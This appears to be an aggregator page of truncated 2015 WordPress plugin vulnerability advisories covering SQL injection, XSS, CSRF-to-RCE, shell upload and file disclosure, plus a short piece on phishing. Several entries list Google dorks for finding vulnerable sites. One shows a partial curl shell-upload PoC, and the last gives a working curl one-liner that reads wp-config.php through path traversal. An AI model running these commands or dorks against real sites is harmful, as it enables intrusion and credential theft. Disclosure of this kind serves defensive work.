WordPress NEX-Forms 3.0 SQL Injection inurlbr

24 April 2015 - Source: http://www.mondounix.com
  # SCRIPT AUTHOR: Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability...


WordPress NEX-Forms 3.0 SQL Injection SQLMAP

24 April 2015 - Source: http://www.mondounix.com
######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
#...


WordPress Add Link to Facebook Stored Cross Site Scripting

23 April 2015 - Source: http://www.mondounix.com
Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin
 
Author: Rohit Kumar
 
Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/
 
Severity: Medium
 
Version Affected: Version 1.215 and mostly prior to it.
 
Version Tested: Version 1.215
 
Version Patched : 1.215
 
Description:
 
Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon
 
About Vulnerability
This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when a user
accessed the “Add Link to Facebook” Settings in WordPress with Administrator privileges. A malicious
administrator can hijack...


WordPress WP Statistics 9.1.2 Cross Site Scripting

22 April 2015 - Source: http://www.mondounix.com
===========================================================
Stored XSS Vulnerability in WP Statistics  Wordpress Plugin 
===========================================================
 
.. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Version Affected: 9.1.2 and mostly prior to it
* Version Tested : 9.1.2
* version patched: 9.1.3
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Check for online users every:
*  Coefficient per visitor:
 
 
About Vulnerability
-------------------
This...


WordPress MiwoFTP 1.0.5 CSRF Command Execution

22 April 2015 - Source: http://www.mondounix.com
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery
remote code execution vulnerability. The application allows users
to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions like executing arbitrary PHP code by uploading
a malicious PHP script file, with administrative privileges, if a
logged-in user visits a malicious...


WordPress MiwoFTP 1.0.5 Cross Site Request Forgery

22 April 2015 - Source: http://www.mondounix.com
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                  ...


WordPress Video Gallery 2.8 SQL Injection

22 April 2015 - Source: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense'...


WordPress N-Media Website Contact Form 1.3.4 Shell Upload

22 April 2015 - Source: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected by an unrestricted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload"...


Computer security: the phishing technique.

19 April 2015 - Source: http://softwareimparo.blogspot.com/
In recent years we have seen exponential growth in new information technologies; we are completely dependent on the various electronic devices in circulation, so much so that a new fear has developed, nomophobia, that is, the fear of being left without a smartphone. In today's article I will introduce the concept of computer security. As telecommunications have expanded in various forms, the techniques people use to "con" others have also multiplied exponentially; this is known as social engineering, which is concerned with getting the user to carry out unwanted operations.
It is precisely because of social engineering that we often pick up viruses (I use this term even though it has fallen out of use; there are far more refined kinds of malware) without even...


WordPress Fusion Engage Local File Disclosure

16 April 2015 - Source: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
}
add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');
add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...
